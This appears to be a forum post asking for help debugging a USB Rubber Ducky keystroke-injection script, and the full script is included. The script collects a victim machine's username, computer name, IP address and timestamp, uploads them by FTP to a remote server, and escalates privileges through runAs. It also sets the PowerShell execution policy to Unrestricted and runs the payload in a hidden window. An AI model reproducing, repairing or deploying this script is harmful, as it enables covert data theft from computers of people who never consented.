tats

  1. FIXED... Increased initial delay to allow the system to read the USB. SLOW system..!!!!
  2. Wrote a ducky script to capture Computer Name, Username, IP address and current timestamp through a PowerShell script. It never works the way I want after encoding it and using the BIN file. The RUN window never opens, and neither does Notepad. It randomly opens some Excel file on the desktop and writes the STRING values there. The PowerShell commands at the end of the script seem to execute fine in the RUN window, but since the PS1 file is never created using Notepad, they are useless. I feel it might have something to do with the encoding - I've tried GB and US (my keyboard layout is US). I have verified that the PowerShell script works otherwise. For encoding, I have tried both the encoder on the DUCKTOOLKIT site and the local JAR encoder. I have also tried with all DELAYs more than 1000. Need help figuring out what's going wrong.

     NOTE: the username, password and server were replaced with correct values in the actual script. Successfully verified the PS script.

     Ducky Script -

         DELAY 500
         GUI R
         DELAY 500
         STRING notepad
         DELAY 500
         ENTER
         DELAY 1000
         STRING $username = $env:username
         ENTER
         STRING $computername = $env:computername
         ENTER
         STRING $ipaddress = ([System.Net.DNS]::GetHostAddresses($env:computername) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | select-object IPAddressToString)[0].IPAddressToString
         ENTER
         STRING $timestamp = (get-date).ToString('d-M-y HH:mm:ss')
         ENTER
         STRING $File = "C:\Users\$username\$computername.txt"
         ENTER
         STRING "Computername: $computername" >> $File
         ENTER
         STRING "Username: $username" >> $File
         ENTER
         STRING "IP-Address: $ipaddress" >> $File
         ENTER
         STRING "Time: $timestamp" >> $File
         ENTER
         STRING "`n" >> $File
         ENTER
         STRING $ftp = "ftp://username:password@server/Ducky/$computername.txt"
         ENTER
         STRING $webclient = New-Object System.Net.WebClient
         ENTER
         STRING $uri = New-Object System.Uri($ftp)
         ENTER
         STRING $webclient.UploadFile($uri, $File)
         ENTER
         STRING $wshell = New-Object -ComObject Wscript.Shell
         ENTER
         STRING $wshell.Popup("Bazinga",0,"OOPS",0x1)
         DELAY 3000
         CTRL s
         DELAY 1000
         STRING %TEMP%\cache.ps1
         TAB
         DELAY 1000
         DOWNARROW
         DOWNARROW
         DELAY 2000
         ENTER
         ALT s
         DELAY 1000
         ALT F4
         DELAY 1000
         GUI r
         DELAY 500
         STRING powershell Start-Process cmd -Verb runAs
         ENTER
         DELAY 500
         ALT y
         DELAY 500
         STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
         ENTER
         DELAY 500
         STRING powershell.exe -windowstyle hidden -File %TEMP%\cache.ps1
         ENTER